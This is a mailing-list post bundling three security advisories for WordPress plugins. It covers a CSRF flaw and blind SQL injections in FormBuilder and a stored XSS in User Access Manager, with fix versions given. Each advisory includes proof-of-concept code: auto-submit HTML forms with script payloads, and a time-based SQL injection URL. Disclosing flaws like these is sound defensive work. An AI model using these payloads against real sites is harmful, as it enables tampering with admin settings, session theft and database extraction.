Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Sat, 28 Jan 2017 16:15:04 +0100
From: Summer of Pwnage <lists@...urify.nl>
To: oss-security@...ts.openwall.com
Subject: Multiple vulnerabilities affecting two WordPress Plugins (XSS, CSRF &
 SQLi)

Please see attached advisories for more information. These issues were 
found during Summer of Pwnage (https://sumofpwn.nl), a Dutch community 
project. Its goal is to contribute to the security of popular, widely 
used OSS projects in a fun and educational way.

------------------------------------------------------------------------
Cross-Site Request Forgery vulnerability in FormBuilder WordPress Plugin
allows plugin permissions modification
------------------------------------------------------------------------
Burak Kelebek, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Request Forgery vulnerability has been encountered in the
FormBuilder WordPress Plugin. This issue allows an attacker to change
permission settings for the plugin by luring a logged on WordPress
Administrator into following a malicious link.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0005

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on FormBuilder [2] version 1.05.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in FormBuilder version 1.08 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The FormBuilder Plugin for WordPress allows you to build contact forms
in the WordPress administrative interface without needing to know PHP or
HTML.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The FormBuilder plugin lacks a CSRF (nonce) token on the request of
saving permissions. Because of this an attacker is able to change
permission settings for the plugin. To achieve this a logged on
WordPress Administrator must be lured into following a malicious link.
Proof of Concept code that demonstrates this issue can be found below. 

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
The Proof of Concept code below injects script code in the "Login
Required Message" in the settings page of the FormBuilder plugin.

<html>
	<body>
		<form
action="http://build.wordpress-develop.dev/wp-admin/admin-ajax.php"
method="POST">
			<input type="hidden" name="task" value="wdm&#95;save&#95;settings" />
			<input type="hidden" name="action" value="wdm&#95;settings" />
			<input type="hidden" name="section" value="basic" />
			<input type="hidden" name="wpdm&#95;permission&#95;msg"
value="Access&#32;Denied" />
			<input type="hidden" name="wpdm&#95;login&#95;msg"
value="&lt;script&gt;alert&#40;&apos;csrf&#32;xss&apos;&#41;&lt;&#47;script&gt;&apos;"
/>
			<input type="hidden" name="&#95;wpdm&#95;file&#95;browser&#95;root"
value="&#47;srv&#47;www&#47;wordpress&#45;develop&#47;build&#47;" />
			<input type="hidden"
name="&#95;wpdm&#95;file&#95;browser&#95;access&#91;&#93;"
value="administrator" />
			<input type="hidden" name="&#95;&#95;wpdm&#95;sanitize&#95;filename"
value="0" />
			<input type="hidden" name="&#95;&#95;wpdm&#95;download&#95;speed"
value="4096" />
			<input type="hidden" name="&#95;&#95;wpdm&#95;download&#95;resume"
value="1" />
			<input type="hidden"
name="&#95;&#95;wpdm&#95;support&#95;output&#95;buffer" value="1" />
			<input type="hidden"
name="&#95;&#95;wpdm&#95;open&#95;in&#95;browser" value="0" />
			<input type="hidden" name="&#95;wpdm&#95;recaptcha&#95;site&#95;key"
value="" />
			<input type="hidden"
name="&#95;wpdm&#95;recaptcha&#95;secret&#95;key" value="" />
			<input type="hidden"
name="&#95;&#95;wpdm&#95;disable&#95;scripts&#91;&#93;" value="" />
			<input type="hidden" name="&#95;&#95;wpdm&#95;login&#95;url" value=""
/>
			<input type="hidden" name="&#95;&#95;wpdm&#95;register&#95;url"
value="" />
			<input type="hidden" name="&#95;&#95;wpdm&#95;user&#95;dashboard"
value="" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_vulnerability_in_formbuilder_wordpress_plugin_allows_plugin_permissions_modification.html
[2] https://wordpress.org/plugins/formbuilder/
[3] https://downloads.wordpress.org/plugin/formbuilder.1.08.zip
------------------------------------------------------------------------
Multiple blind SQL injection vulnerabilities in FormBuilder WordPress
Plugin
------------------------------------------------------------------------
Burak Kelebek, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
Multiple blind SQL injection vulnerabilities were found in the
FormBuilder WordPress Plugin. This allows an attacker, granted he has
Author or higher privileges, to extract arbitrary data (eg the
Administrator's password hash) from the WordPress database. Since there
is no CSRF protection in place, an attacker could also lure an logged-in
Author to perform malicious SQL commands on the database.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0008

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on FormBuilder [2] version 1.05.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in FormBuilder version 1.08 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The FormBuilder Plugin for WordPress allows you to build contact forms
in the WordPress administrative interface without needing to know PHP or
HTML.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
It was discovered that FormBuilder is affected by multiple blind SQL
injection vulnerabilities. Using these issues it is possible for a
logged on Author (or higher privileges) to extract arbitrary data (eg,
the Administrator's password hash) from the WordPress database. Since
there is no CSRF protection in place, an attacker could also lure an
logged-in Author to perform malicious SQL commands on the database.

The vulnerabilities exist in the following functions:
- formbuilder_options_exportForm 
- formbuilder_options_removeForm 
- formbuilder_options_editForm 

The "fbid" parameter used in the above functions can be supplied by the
user and is appended to the WHERE clause as "form_id" directly without
performing any sanitization or escaping.

Example 1:

formbuilder/php/formbuilder_admin_functions.php 
case "exportForm":
formbuilder_options_exportForm($_GET['fbid']);


formbuilder/php/formbuilder_admin_pages.inc.php
function formbuilder_options_exportForm($form_id)
 	{
 		[..]
 		
 		/*
 		 * Load the form fields from the database.
 		*/
 		$sql = "SELECT * FROM " . FORMBUILDER_TABLE_FORMS . " WHERE id =
'$form_id' LIMIT 0,1;";
 		$results = $wpdb->get_results($sql, ARRAY_A);
 		$form = $results[0];
 		
 		$sql = "SELECT * FROM " . FORMBUILDER_TABLE_FIELDS . " WHERE form_id
= $form_id ORDER BY display_order ASC;";
 		$fields = $wpdb->get_results($sql, ARRAY_A);

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
http://<target>/wp-admin/tools.php?page=formbuilder.php&fbtag&pageNumber&fbaction=exportForm&fbid=1
AND (SELECT * FROM (SELECT(SLEEP(5)))WSdS)
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/multiple_blind_sql_injection_vulnerabilities_in_formbuilder_wordpress_plugin.html
[2] https://wordpress.org/plugins/formbuilder/
[3] https://downloads.wordpress.org/plugin/formbuilder.1.08.zip
------------------------------------------------------------------------
Persistent Cross-Site Scripting vulnerability in User Access Manager
WordPress Plugin
------------------------------------------------------------------------
Burak Kelebek, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A persistent Cross-Site Scripting vulnerability has been encountered in
the User Access Manager WordPress Plugin. This issue allows an attacker
to perform a wide variety of actions, such as stealing Administrators'
session tokens, or performing arbitrary actions on their behalf. In
order to exploit this issue, the attacker has to lure/force a logged on
WordPress Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0025

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on the User Access Manager [2]
WordPress Plugin version 1.2.6.7.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in User Access Manager version 1.2.14 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
With the User Access Manager WordPress plugin it is possible to manage
access to posts, pages and files. This plugin is useful if you need a
member area or a private section at your blog or you want that other
people can write at your blog but not everywhere.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
Persistent Cross-Site Scripting was found in admin panel 'manage' page
of User Access Manager. Multiple parameters in POST uam_usergroup are
affected due to insufficient output encoding. This issue allows an
attacker to perform a wide variety of actions, such as stealing
Administrators' session tokens, or performing arbitrary actions on their
behalf. In order to exploit this issue, the attacker has to lure/force a
logged on WordPress Administrator into opening a malicious website.
	
------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form action="http://<target>/wp-admin/admin.php?page=uam_usergroup"
method="POST">
			<input type="hidden" name="uamInsertUpdateGroupNonce"
value="8657bd2424" />
			<input type="hidden" name="_wp_http_referer"
value="/wp-admin/admin.php?page=uam_usergroup" />
			<input type="hidden" name="action" value="addGroup" />
			<input type="hidden" name="userGroupName"
value="as<script>alert(1)</script>" />
			<input type="hidden" name="userGroupDescription" value="asd" />
			<input type="hidden" name="ipRange" value="asd" />
			<input type="hidden" name="readAccess" value="group" />
			<input type="hidden" name="writeAccess" value="group" />
			<input type="hidden" name="submit" value="Add user group" />
			<input type="hidden" name="" value="" />
			<input type="submit" value="Submit" />
		</form>
	</body>
</html>


<html>
	<body>
		<form action="http://<target>/wp-admin/admin.php?page=uam_usergroup"
method="POST">
			<input type="hidden" name="uamInsertUpdateGroupNonce"
value="8657bd2424" />
			<input type="hidden" name="_wp_http_referer"
value="/wp-admin/admin.php?page=uam_usergroup" />
			<input type="hidden" name="action" value="addGroup" />
			<input type="hidden" name="userGroupName" value="sad" />
			<input type="hidden" name="userGroupDescription"
value="<script>alert(2)</script>" />
			<input type="hidden" name="ipRange" value="asd" />
			<input type="hidden" name="readAccess" value="group" />
			<input type="hidden" name="writeAccess" value="group" />
			<input type="hidden" name="submit" value="Add user group" />
			<input type="submit" value="Submit" />
		</form>
	</body>
</html>

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_vulnerability_in_user_access_manager_wordpress_plugin.html
[2] https://wordpress.org/plugins/user-access-manager/
[3]
https://downloads.wordpress.org/plugin/user-access-manager.1.2.14.zip

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ